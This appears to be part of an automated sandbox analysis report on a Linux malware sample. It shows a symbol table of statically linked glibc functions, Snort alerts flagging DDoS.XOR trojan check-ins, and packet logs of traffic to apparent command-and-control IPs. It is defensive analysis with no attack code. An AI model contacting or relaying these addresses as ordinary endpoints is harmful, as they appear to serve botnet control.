__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7ee8	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__			.symtab	0x80c7eec	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_res_thread_freeres__			.symtab	0x80c7ee0	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_thread_subfreeres_element_arena_thread_freeres__			.symtab	0x80c7ef4	4	OBJECT	<unknown>	DEFAULT	10
__elf_set___libc_thread_subfreeres_element_res_thread_freeres__			.symtab	0x80c7ef8	4	OBJECT	<unknown>	DEFAULT	10
__environ			.symtab	0x80d5034	4	OBJECT	<unknown>	DEFAULT	22
__errno_location			.symtab	0x8054290	17	FUNC	<unknown>	DEFAULT	3
__execve			.symtab	0x8067a40	57	FUNC	<unknown>	DEFAULT	3
__exit_funcs			.symtab	0x80cf514	4	OBJECT	<unknown>	DEFAULT	21
__exit_thread			.symtab	0x8068c00	26	FUNC	<unknown>	DEFAULT	3
__fcloseall			.symtab	0x8059ac0	9	FUNC	<unknown>	DEFAULT	3
__fcntl			.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__fcntl_nocancel			.symtab	0x8053b20	69	FUNC	<unknown>	DEFAULT	3
__find_in_stack_list			.symtab	0x80508f0	131	FUNC	<unknown>	DEFAULT	3
__find_specmb			.symtab	0x8083400	117	FUNC	<unknown>	DEFAULT	3
__fini_array_end			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__fini_array_start			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__fopen_internal			.symtab	0x80581c0	218	FUNC	<unknown>	DEFAULT	3
__fopen_maybe_mmap			.symtab	0x8058180	63	FUNC	<unknown>	DEFAULT	3
__fork			.symtab	0x8054280	9	FUNC	<unknown>	DEFAULT	3
__fork_generation			.symtab	0x80d617c	4	OBJECT	<unknown>	DEFAULT	22
__fork_generation_pointer			.symtab	0x80d6248	4	OBJECT	<unknown>	DEFAULT	22
__fork_handlers			.symtab	0x80d624c	4	OBJECT	<unknown>	DEFAULT	22
__fork_lock			.symtab	0x80d50e0	4	OBJECT	<unknown>	DEFAULT	22
__fprintf			.symtab	0x8083330	36	FUNC	<unknown>	DEFAULT	3
__fpu_control			.symtab	0x80cfc58	2	OBJECT	<unknown>	DEFAULT	21
__frame_state_for			.symtab	0x80ae290	298	FUNC	<unknown>	HIDDEN	3
__free			.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__free_hook			.symtab	0x80d4b44	4	OBJECT	<unknown>	DEFAULT	22
__free_stack_cache			.symtab	0x8050aa0	157	FUNC	<unknown>	DEFAULT	3
__free_tcb			.symtab	0x8051470	70	FUNC	<unknown>	DEFAULT	3
__fsetlocking			.symtab	0x8085ce0	56	FUNC	<unknown>	DEFAULT	3
__funlockfile			.symtab	0x80833c0	47	FUNC	<unknown>	DEFAULT	3
__fxstat64			.symtab	0x8068d20	54	FUNC	<unknown>	DEFAULT	3
__gcc_personality_v0			.symtab	0x80b14b0	538	FUNC	<unknown>	HIDDEN	3
__gconv			.symtab	0x80a2fe0	354	FUNC	<unknown>	DEFAULT	3
__gconv_alias_compare			.symtab	0x806cca0	25	FUNC	<unknown>	DEFAULT	3
__gconv_alias_db			.symtab	0x80d6318	4	OBJECT	<unknown>	DEFAULT	22
__gconv_btwoc_ascii			.symtab	0x806e830	17	FUNC	<unknown>	DEFAULT	3
__gconv_close			.symtab	0x8094890	145	FUNC	<unknown>	DEFAULT	3
__gconv_close_transform			.symtab	0x806ce00	181	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias			.symtab	0x806cd20	219	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias_cache			.symtab	0x80731e0	413	FUNC	<unknown>	DEFAULT	3
__gconv_find_shlib			.symtab	0x8073900	397	FUNC	<unknown>	DEFAULT	3
__gconv_find_transform			.symtab	0x806d7b0	564	FUNC	<unknown>	DEFAULT	3
__gconv_get_alias_db			.symtab	0x806cc40	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_builtin_trans			.symtab	0x806e660	450	FUNC	<unknown>	DEFAULT	3
__gconv_get_cache			.symtab	0x8072ee0	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_modules_db			.symtab	0x806cc30	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_path			.symtab	0x806df30	730	FUNC	<unknown>	DEFAULT	3
__gconv_load_cache			.symtab	0x8073000	479	FUNC	<unknown>	DEFAULT	3
__gconv_lock			.symtab	0x80d6314	4	OBJECT	<unknown>	DEFAULT	22
__gconv_lookup_cache			.symtab	0x8073380	1216	FUNC	<unknown>	DEFAULT	3
__gconv_max_path_elem_len			.symtab	0x80d6320	4	OBJECT	<unknown>	DEFAULT	22
__gconv_modules_db			.symtab	0x80d6310	4	OBJECT	<unknown>	DEFAULT	22
__gconv_open			.symtab	0x80a28e0	1786	FUNC	<unknown>	DEFAULT	3
__gconv_path_elem			.symtab	0x80d6324	4	OBJECT	<unknown>	DEFAULT	22
__gconv_path_envvar			.symtab	0x80d631c	4	OBJECT	<unknown>	DEFAULT	22
__gconv_read_conf			.symtab	0x806e210	1061	FUNC	<unknown>	DEFAULT	3
__gconv_release_cache			.symtab	0x8072ef0	26	FUNC	<unknown>	DEFAULT	3
__gconv_release_shlib			.symtab	0x80738b0	34	FUNC	<unknown>	DEFAULT	3
__gconv_release_step			.symtab	0x806ccc0	85	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ascii_internal			.symtab	0x806fa60	891	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ascii			.symtab	0x806f430	1573	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2			.symtab	0x806e850	1688	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2reverse			.symtab	0x8070240	1693	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4			.symtab	0x80712d0	895	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4le			.symtab	0x8071650	879	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_utf8			.symtab	0x8072680	2138	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2_internal			.symtab	0x806eef0	1343	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2reverse_internal			.symtab	0x80708e0	1374	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4_internal			.symtab	0x8070e40	1164	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4le_internal			.symtab	0x806fde0	1111	FUNC	<unknown>	DEFAULT	3
__gconv_transform_utf8_internal			.symtab	0x80719c0	3253	FUNC	<unknown>	DEFAULT	3
__gconv_translit_find			.symtab	0x8094a20	610	FUNC	<unknown>	DEFAULT	3
__gconv_transliterate			.symtab	0x8094cb0	873	FUNC	<unknown>	DEFAULT	3
__get_avphys_pages			.symtab	0x806a8a0	14	FUNC	<unknown>	DEFAULT	3
__get_nprocs			.symtab	0x806aaf0	323	FUNC	<unknown>	DEFAULT	3
__get_nprocs_conf			.symtab	0x806aaf0	323	FUNC	<unknown>	DEFAULT	3
__get_phys_pages			.symtab	0x806a8b0	14	FUNC	<unknown>	DEFAULT	3
__getclktck			.symtab	0x806ac40	20	FUNC	<unknown>	DEFAULT	3
__getcwd			.symtab	0x808b5f0	234	FUNC	<unknown>	DEFAULT	3
__getdelim			.symtab	0x8083eb0	624	FUNC	<unknown>	DEFAULT	3
__getdents			.symtab	0x80674a0	159	FUNC	<unknown>	DEFAULT	3
__getdtablesize			.symtab	0x8069140	41	FUNC	<unknown>	DEFAULT	3
__getegid			.symtab	0x808b560	12	FUNC	<unknown>	DEFAULT	3
__geteuid			.symtab	0x808b540	12	FUNC	<unknown>	DEFAULT	3
__getgid			.symtab	0x808b550	12	FUNC	<unknown>	DEFAULT	3
__gethostname			.symtab	0x809fcc0	140	FUNC	<unknown>	DEFAULT	3
__getpagesize			.symtab	0x8069120	23	FUNC	<unknown>	DEFAULT	3
__getpid			.symtab	0x8067ea0	49	FUNC	<unknown>	DEFAULT	3
__getrlimit			.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__getsockname			.symtab	0x806ae00	30	FUNC	<unknown>	DEFAULT	3
__getsockopt			.symtab	0x806ae20	30	FUNC	<unknown>	DEFAULT	3
__gettext_extract_plural			.symtab	0x8078660	266	FUNC	<unknown>	DEFAULT	3
__gettext_free_exp			.symtab	0x8077ad0	523	FUNC	<unknown>	DEFAULT	3
__gettext_germanic_plural			.symtab	0x80c2248	20	OBJECT	<unknown>	DEFAULT	7
__gettextparse			.symtab	0x8077dd0	2186	FUNC	<unknown>	DEFAULT	3
__gettimeofday			.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__gettimeofday_internal			.symtab	0x8067190	31	FUNC	<unknown>	DEFAULT	3
__getuid			.symtab	0x808b530	12	FUNC	<unknown>	DEFAULT	3
__gmon_start__			.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__guess_grouping			.symtab	0x807f2a0	76	FUNC	<unknown>	DEFAULT	3
__hash_string			.symtab	0x8078770	59	FUNC	<unknown>	DEFAULT	3
__i686.get_pc_thunk.bx			.symtab	0x80af81d	0	FUNC	<unknown>	HIDDEN	3
__i686.get_pc_thunk.cx			.symtab	0x80af819	0	FUNC	<unknown>	HIDDEN	3
__inet_aton			.symtab	0x806b260	343	FUNC	<unknown>	DEFAULT	3
__init_array_end			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_array_start			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__init_misc			.symtab	0x806ac60	78	FUNC	<unknown>	DEFAULT	3
__init_sched_fifo_prio			.symtab	0x8053f80	42	FUNC	<unknown>	DEFAULT	3
__initstate			.symtab	0x8056370	112	FUNC	<unknown>	DEFAULT	3
__initstate_r			.symtab	0x8056780	545	FUNC	<unknown>	DEFAULT	3
__ioctl			.symtab	0x80690f0	33	FUNC	<unknown>	DEFAULT	3
__is_smp			.symtab	0x80d6190	4	OBJECT	<unknown>	DEFAULT	22
__isatty			.symtab	0x808b6e0	34	FUNC	<unknown>	DEFAULT	3
__isinf			.symtab	0x80964d0	64	FUNC	<unknown>	DEFAULT	3
__isinfl			.symtab	0x8096540	85	FUNC	<unknown>	DEFAULT	3
__isnan			.symtab	0x8096510	39	FUNC	<unknown>	DEFAULT	3
__isnanl			.symtab	0x80965a0	69	FUNC	<unknown>	DEFAULT	3
__kill			.symtab	0x8055560	31	FUNC	<unknown>	DEFAULT	3
__lchown			.symtab	0x8068d80	57	FUNC	<unknown>	DEFAULT	3
__libc_alloca_cutoff			.symtab	0x806b010	66	FUNC	<unknown>	DEFAULT	3
__libc_argc			.symtab	0x80d6308	4	OBJECT	<unknown>	DEFAULT	22
__libc_argv			.symtab	0x80d630c	4	OBJECT	<unknown>	DEFAULT	22
__libc_calloc			.symtab	0x80639e0	842	FUNC	<unknown>	DEFAULT	3
__libc_check_standard_fds			.symtab	0x8054cd0	459	FUNC	<unknown>	DEFAULT	3
__libc_cleanup_routine			.symtab	0x806b060	27	FUNC	<unknown>	DEFAULT	3
__libc_close			.symtab	0x8053ad0	80	FUNC	<unknown>	DEFAULT	3
__libc_connect			.symtab	0x8053c30	87	FUNC	<unknown>	DEFAULT	3
__libc_csu_fini			.symtab	0x8055120	57	FUNC	<unknown>	DEFAULT	3
__libc_csu_init			.symtab	0x8055160	127	FUNC	<unknown>	DEFAULT	3
__libc_disable_asynccancel			.symtab	0x806b080	50	FUNC	<unknown>	DEFAULT	3
__libc_dlclose			.symtab	0x80945c0	87	FUNC	<unknown>	DEFAULT	3
__libc_dlopen_mode			.symtab	0x8094700	226	FUNC	<unknown>	DEFAULT	3
__libc_dlsym			.symtab	0x8094620	108	FUNC	<unknown>	DEFAULT	3
__libc_dlsym_private			.symtab	0x8094690	108	FUNC	<unknown>	DEFAULT	3
__libc_enable_asynccancel			.symtab	0x806b0c0	98	FUNC	<unknown>	DEFAULT	3
__libc_enable_secure			.symtab	0x80cf140	4	OBJECT	<unknown>	DEFAULT	18
__libc_enable_secure_decided			.symtab	0x80d6304	4	OBJECT	<unknown>	DEFAULT	22
__libc_errno			.symtab	0x14	4	TLS	<unknown>	DEFAULT	14
__libc_fatal			.symtab	0x8059d90	42	FUNC	<unknown>	DEFAULT	3
__libc_fcntl			.symtab	0x8053b70	177	FUNC	<unknown>	DEFAULT	3
__libc_fork			.symtab	0x8067810	535	FUNC	<unknown>	DEFAULT	3
__libc_free			.symtab	0x8065320	410	FUNC	<unknown>	DEFAULT	3
__libc_init_first			.symtab	0x806cba0	133	FUNC	<unknown>	DEFAULT	3
__libc_init_secure			.symtab	0x806cb40	66	FUNC	<unknown>	DEFAULT	3
__libc_longjmp			.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_lseek			.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__libc_lseek64			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__libc_mallinfo			.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__libc_malloc			.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__libc_malloc_initialized			.symtab	0x80cf9f8	4	OBJECT	<unknown>	DEFAULT	21
__libc_mallopt			.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__libc_memalign			.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__libc_message			.symtab	0x8059ad0	691	FUNC	<unknown>	DEFAULT	3
__libc_multiple_libcs			.symtab	0x80cfa4c	4	OBJECT	<unknown>	DEFAULT	21
__libc_nanosleep			.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__libc_open			.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__libc_pause			.symtab	0x8053de0	64	FUNC	<unknown>	DEFAULT	3
__libc_pthread_init			.symtab	0x806b230	45	FUNC	<unknown>	DEFAULT	3
__libc_pvalloc			.symtab	0x80630c0	469	FUNC	<unknown>	DEFAULT	3
__libc_read			.symtab	0x8053a70	91	FUNC	<unknown>	DEFAULT	3
__libc_realloc			.symtab	0x80654c0	1085	FUNC	<unknown>	DEFAULT	3
__libc_recvfrom			.symtab	0x8053c90	87	FUNC	<unknown>	DEFAULT	3
__libc_register_dl_open_hook			.symtab	0x80947f0	125	FUNC	<unknown>	DEFAULT	3
__libc_register_dlfcn_hook			.symtab	0x809e5b0	37	FUNC	<unknown>	DEFAULT	3
__libc_resp			.symtab	0x0	4	TLS	<unknown>	DEFAULT	13
__libc_select			.symtab	0x8069170	115	FUNC	<unknown>	DEFAULT	3
__libc_send			.symtab	0x806ae40	87	FUNC	<unknown>	DEFAULT	3
__libc_sendto			.symtab	0x8053cf0	87	FUNC	<unknown>	DEFAULT	3
__libc_setlocale_lock			.symtab	0x80d58a0	32	OBJECT	<unknown>	DEFAULT	22
__libc_setup_tls			.symtab	0x8054f00	505	FUNC	<unknown>	DEFAULT	3
__libc_sigaction			.symtab	0x8054730	298	FUNC	<unknown>	DEFAULT	3
__libc_siglongjmp			.symtab	0x8055350	84	FUNC	<unknown>	DEFAULT	3
__libc_stack_end			.symtab	0x80cf13c	4	OBJECT	<unknown>	DEFAULT	18
__libc_start_main			.symtab	0x80549b0	763	FUNC	<unknown>	DEFAULT	3
__libc_system			.symtab	0x8057a30	104	FUNC	<unknown>	DEFAULT	3
__libc_thread_freeres			.symtab	0x80b2980	33	FUNC	<unknown>	DEFAULT	5
__libc_tsd_CTYPE_B			.symtab	0x18	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOLOWER			.symtab	0x20	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOUPPER			.symtab	0x1c	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_LOCALE			.symtab	0x8	4	TLS	<unknown>	DEFAULT	13
__libc_tsd_MALLOC			.symtab	0x24	4	TLS	<unknown>	DEFAULT	14
__libc_valloc			.symtab	0x80632a0	467	FUNC	<unknown>	DEFAULT	3
__libc_waitpid			.symtab	0x8053e20	91	FUNC	<unknown>	DEFAULT	3
__libc_write			.symtab	0x8053a10	91	FUNC	<unknown>	DEFAULT	3
__libc_writev			.symtab	0x808b980	270	FUNC	<unknown>	DEFAULT	3
__libio_codecvt			.symtab	0x80c2e00	120	OBJECT	<unknown>	DEFAULT	7
__libio_translit			.symtab	0x80c2e78	20	OBJECT	<unknown>	DEFAULT	7
__lll_lock_wait			.symtab	0x8053730	48	FUNC	<unknown>	HIDDEN	3
__lll_lock_wait_private			.symtab	0x8053700	42	FUNC	<unknown>	HIDDEN	3
__lll_robust_lock_wait			.symtab	0x80538e0	81	FUNC	<unknown>	HIDDEN	3
__lll_robust_timedlock_wait			.symtab	0x8053940	201	FUNC	<unknown>	HIDDEN	3
__lll_timedlock_wait			.symtab	0x8053760	173	FUNC	<unknown>	HIDDEN	3
__lll_timedwait_tid			.symtab	0x8053870	112	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake			.symtab	0x8053840	43	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake_private			.symtab	0x8053810	37	FUNC	<unknown>	HIDDEN	3
__llseek			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__localtime_r			.symtab	0x8086e00	34	FUNC	<unknown>	DEFAULT	3
__longjmp			.symtab	0x80553b0	43	FUNC	<unknown>	DEFAULT	3
__lseek			.symtab	0x8053d50	33	FUNC	<unknown>	DEFAULT	3
__lseek64			.symtab	0x806ad50	117	FUNC	<unknown>	DEFAULT	3
__make_stacks_executable			.symtab	0x8051210	257	FUNC	<unknown>	DEFAULT	3
__mallinfo			.symtab	0x8060a60	353	FUNC	<unknown>	DEFAULT	3
__malloc			.symtab	0x8063d30	442	FUNC	<unknown>	DEFAULT	3
__malloc_check_init			.symtab	0x8060000	121	FUNC	<unknown>	DEFAULT	3
__malloc_get_state			.symtab	0x8064180	428	FUNC	<unknown>	DEFAULT	3
__malloc_hook			.symtab	0x80cf9ec	4	OBJECT	<unknown>	DEFAULT	21
__malloc_initialize_hook			.symtab	0x80d4b40	4	OBJECT	<unknown>	DEFAULT	22
__malloc_set_state			.symtab	0x8060dc0	905	FUNC	<unknown>	DEFAULT	3
__malloc_stats			.symtab	0x8060840	529	FUNC	<unknown>	DEFAULT	3
__malloc_trim			.symtab	0x8060bd0	493	FUNC	<unknown>	DEFAULT	3
__malloc_usable_size			.symtab	0x805f010	52	FUNC	<unknown>	DEFAULT	3
__mallopt			.symtab	0x8061150	356	FUNC	<unknown>	DEFAULT	3
__mbrlen			.symtab	0x8086500	55	FUNC	<unknown>	DEFAULT	3
__mbrtowc			.symtab	0x8086540	407	FUNC	<unknown>	DEFAULT	3
__mbsnrtowcs			.symtab	0x8086ae0	594	FUNC	<unknown>	DEFAULT	3
__memalign			.symtab	0x8063ef0	467	FUNC	<unknown>	DEFAULT	3
__memalign_hook			.symtab	0x80cf9f4	4	OBJECT	<unknown>	DEFAULT	21
__memchr			.symtab	0x8066760	411	FUNC	<unknown>	DEFAULT	3
__mempcpy			.symtab	0x8066a20	68	FUNC	<unknown>	DEFAULT	3
__mkdir			.symtab	0x8068d60	31	FUNC	<unknown>	DEFAULT	3
__mktime_internal			.symtab	0x809f300	2437	FUNC	<unknown>	DEFAULT	3
__mmap			.symtab	0x8069da0	67	FUNC	<unknown>	DEFAULT	3
__mmap64			.symtab	0x8069df0	88	FUNC	<unknown>	DEFAULT	3
__mon_yday			.symtab	0x80c72c0	52	OBJECT	<unknown>	DEFAULT	7
__morecore			.symtab	0x80cf9e8	4	OBJECT	<unknown>	DEFAULT	21
__mpn_add_n			.symtab	0x80aa690	144	FUNC	<unknown>	DEFAULT	3
__mpn_addmul_1			.symtab	0x80aa720	60	FUNC	<unknown>	DEFAULT	3
__mpn_cmp			.symtab	0x8096b60	92	FUNC	<unknown>	DEFAULT	3
__mpn_construct_double			.symtab	0x80aa7a0	86	FUNC	<unknown>	DEFAULT	3
__mpn_construct_float			.symtab	0x80aa760	49	FUNC	<unknown>	DEFAULT	3
__mpn_construct_long_double			.symtab	0x80aa800	71	FUNC	<unknown>	DEFAULT	3
__mpn_divrem			.symtab	0x8096bc0	1112	FUNC	<unknown>	DEFAULT	3
__mpn_extract_double			.symtab	0x80988b0	244	FUNC	<unknown>	DEFAULT	3
__mpn_extract_long_double			.symtab	0x80989b0	279	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n			.symtab	0x8097670	1989	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n_basecase			.symtab	0x8097570	247	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n			.symtab	0x8097e40	1829	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n_basecase			.symtab	0x8097470	250	FUNC	<unknown>	DEFAULT	3
__mpn_lshift			.symtab	0x8097020	87	FUNC	<unknown>	DEFAULT	3
__mpn_mul			.symtab	0x80970e0	843	FUNC	<unknown>	DEFAULT	3
__mpn_mul_1			.symtab	0x8097430	57	FUNC	<unknown>	DEFAULT	3
__mpn_mul_n			.symtab	0x8098570	620	FUNC	<unknown>	DEFAULT	3
__mpn_rshift			.symtab	0x8097080	87	FUNC	<unknown>	DEFAULT	3
__mpn_sub_n			.symtab	0x80987e0	144	FUNC	<unknown>	DEFAULT	3
__mpn_submul_1			.symtab	0x8098870	60	FUNC	<unknown>	DEFAULT	3
__mprotect			.symtab	0x8069e70	33	FUNC	<unknown>	DEFAULT	3
__mremap			.symtab	0x806add0	45	FUNC	<unknown>	DEFAULT	3
__munmap			.symtab	0x8069e50	31	FUNC	<unknown>	DEFAULT	3
__nanosleep			.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__nanosleep_nocancel			.symtab	0x80677ba	31	FUNC	<unknown>	DEFAULT	3
__new_exitfn			.symtab	0x8056000	274	FUNC	<unknown>	DEFAULT	3
__new_exitfn_called			.symtab	0x80d6240	8	OBJECT	<unknown>	DEFAULT	22
__new_fclose			.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
__new_fopen			.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
__new_getrlimit			.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__new_sem_init			.symtab	0x8053320	84	FUNC	<unknown>	DEFAULT	3
__new_sem_post			.symtab	0x8053420	78	FUNC	<unknown>	DEFAULT	3
__new_sem_wait			.symtab	0x8053380	141	FUNC	<unknown>	DEFAULT	3
__nptl_create_event			.symtab	0x8054700	5	FUNC	<unknown>	DEFAULT	3
__nptl_deallocate_tsd			.symtab	0x8050980	278	FUNC	<unknown>	DEFAULT	3
__nptl_death_event			.symtab	0x8054710	5	FUNC	<unknown>	DEFAULT	3
__nptl_initial_report_events			.symtab	0x80d20cc	1	OBJECT	<unknown>	DEFAULT	22
__nptl_last_event			.symtab	0x80d20c0	4	OBJECT	<unknown>	DEFAULT	22
__nptl_nthreads			.symtab	0x80cf4f0	4	OBJECT	<unknown>	DEFAULT	21
__nptl_setxid			.symtab	0x8050e60	941	FUNC	<unknown>	DEFAULT	3
__nptl_threads_events			.symtab	0x80d20b8	8	OBJECT	<unknown>	DEFAULT	22
__offtime			.symtab	0x809f010	746	FUNC	<unknown>	DEFAULT	3
__open			.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__open_nocancel			.symtab	0x8053d8a	33	FUNC	<unknown>	DEFAULT	3
__opendir			.symtab	0x80672a0	220	FUNC	<unknown>	DEFAULT	3
__overflow			.symtab	0x805d810	41	FUNC	<unknown>	DEFAULT	3
__parse_one_specmb			.symtab	0x8083480	1320	FUNC	<unknown>	DEFAULT	3
__pause_nocancel			.symtab	0x8053dea	19	FUNC	<unknown>	DEFAULT	3
__posix_memalign			.symtab	0x80640d0	111	FUNC	<unknown>	DEFAULT	3
__preinit_array_end			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__preinit_array_start			.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__printf_arginfo_table			.symtab	0x80d63e0	4	OBJECT	<unknown>	DEFAULT	23
__printf_fp			.symtab	0x807f620	9363	FUNC	<unknown>	DEFAULT	3
__printf_fphex			.symtab	0x8081b50	6104	FUNC	<unknown>	DEFAULT	3

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.2354.36.15.9957652802021336 07/09/22-18:43:50.434118	TCP	2021336	ET TROJAN DDoS.XOR Checkin via HTTP	57652	80	192.168.2.23	54.36.15.99
192.168.2.2354.36.15.9645690532020381 07/09/22-18:43:50.618138	TCP	2020381	ET TROJAN DDoS.XOR Checkin	45690	53	192.168.2.23	54.36.15.96

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 9, 2022 18:43:50.405172110 CEST	57652	80	192.168.2.23	54.36.15.99
Jul 9, 2022 18:43:50.414134979 CEST	38648	53	192.168.2.23	51.89.52.12
Jul 9, 2022 18:43:50.432872057 CEST	80	57652	54.36.15.99	192.168.2.23
Jul 9, 2022 18:43:50.432957888 CEST	57652	80	192.168.2.23	54.36.15.99
Jul 9, 2022 18:43:50.433012009 CEST	53	38648	51.89.52.12	192.168.2.23
Jul 9, 2022 18:43:50.434118032 CEST	57652	80	192.168.2.23	54.36.15.99
Jul 9, 2022 18:43:50.461807013 CEST	80	57652	54.36.15.99	192.168.2.23
Jul 9, 2022 18:43:50.463247061 CEST	57652	80	192.168.2.23	54.36.15.99
Jul 9, 2022 18:43:50.489211082 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:43:50.490967989 CEST	80	57652	54.36.15.99	192.168.2.23
Jul 9, 2022 18:43:50.517319918 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:43:50.517456055 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:43:50.534085989 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:43:50.617892981 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:43:50.618138075 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:43:50.647607088 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:43:50.647756100 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:43:51.483376980 CEST	42836	443	192.168.2.23	91.189.91.43
Jul 9, 2022 18:43:52.251247883 CEST	42516	80	192.168.2.23	109.202.202.202
Jul 9, 2022 18:43:59.747014046 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:43:59.747279882 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:44:06.842649937 CEST	43928	443	192.168.2.23	91.189.91.42
Jul 9, 2022 18:44:09.775974035 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:44:09.776083946 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:44:17.082079887 CEST	42836	443	192.168.2.23	91.189.91.43
Jul 9, 2022 18:44:19.808593988 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:44:19.808824062 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:44:23.225656986 CEST	42516	80	192.168.2.23	109.202.202.202
Jul 9, 2022 18:44:29.841607094 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:44:29.841763973 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:44:34.780497074 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:44:34.780622959 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:44:44.814677000 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:44:44.814954996 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:44:47.804505110 CEST	43928	443	192.168.2.23	91.189.91.42
Jul 9, 2022 18:44:54.844765902 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:44:54.844980001 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:45:04.877028942 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:45:04.877403021 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:45:08.279642105 CEST	42836	443	192.168.2.23	91.189.91.43
Jul 9, 2022 18:45:09.831677914 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:45:09.831783056 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:45:19.863102913 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:45:19.863447905 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:45:29.895916939 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:45:29.896001101 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:45:39.928158045 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:45:39.928455114 CEST	45690	53	192.168.2.23	54.36.15.96
Jul 9, 2022 18:45:44.883074999 CEST	53	45690	54.36.15.96	192.168.2.23
Jul 9, 2022 18:45:44.883425951 CEST	45690	53	192.168.2.23	54.36.15.96

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 9, 2022 18:43:50.385700941 CEST	55947	53	192.168.2.23	8.8.8.8
Jul 9, 2022 18:43:50.393372059 CEST	58098	53	192.168.2.23	8.8.8.8
Jul 9, 2022 18:43:50.405038118 CEST	53	55947	8.8.8.8	192.168.2.23
